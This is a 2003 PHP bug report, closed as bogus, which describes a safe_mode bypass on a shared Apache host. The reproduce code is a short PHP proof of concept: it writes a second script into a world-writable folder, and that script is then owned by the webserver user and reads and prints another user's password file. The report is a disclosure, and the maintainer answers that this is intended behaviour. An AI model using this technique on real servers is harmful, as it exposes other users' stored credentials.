ID: 25149 Updated by: [EMAIL PROTECTED] Reported By: marrtins at hackers dot lv -Status: Open +Status: Bogus Bug Type: Scripting Engine problem Operating System: Linux PHP Version: 4.3.1 New Comment:
Thank you for taking the time to write to us, but this is not a bug. Please double-check the documentation available at http://www.php.net/manual/ and the instructions on how to report a bug at http://bugs.php.net/how-to-report.php This is how safe_mode works. Previous Comments: ------------------------------------------------------------------------ [2003-08-19 11:15:33] marrtins at hackers dot lv Description: ------------ apache_1.3.27 httpd.conf ---------- User webmaster Group nobody ./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite ====================================== php-4.3.0 php.ini --------- safe_mode = On ./configure \ --with-mysql=/usr/local \ --with-mcrypt=/usr/local/lib/libmcrypt \ --with-apache=../apache_1.3.27 \ --enable-track-vars \ --with-gd=/usr/local \ --with-interbase=/opt/interbase \ --enable-trans-sid \ --with-png-dir=/usr/local \ --with-jpeg-dir=/usr/local \ --with-zlib-dir=/usr/local \ --enable-sockets \ --with-gettext \ --with-xml \ --enable-ftp \ --with-imap=/root/.hore_imp/imap-2002.RC10 \ --with-iconv=/usr/local/ ====================================== ~/public_html> ls -al * drwxr-xr-x 3 test users 4096 aug 19 19:05 . drwx--x--x 5 test users 4096 aug 19 19:04 .. -rw-r--r-- 1 test users 146 aug 19 18:47 hack.php drwxrwxrwx 2 test users 4096 aug 19 19:03 test after accessing http://some_server/~test/hack.php php makes test/stole.php ~/public_html> ls -al test drwxrwxrwx 2 test users 4096 aug 19 19:07 . drwxr-xr-x 3 test users 4096 aug 19 19:05 .. -rw-r--r-- 1 webmaste nobody 61 aug 19 19:07 stole.php after that http://some_server/~test/test/stole.php locally reads /www/secret/pass.inc.php owned by webmaster Reproduce code: --------------- <? $data='<? $data = file(\'/www/secret/pass.inc.php\'); print_r($data); ?>'; $f=fopen('/home/test/public_html/test/stole.php', 'w'); fwrite($f, $data); fclose($f); ?> ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=25149&edit=1
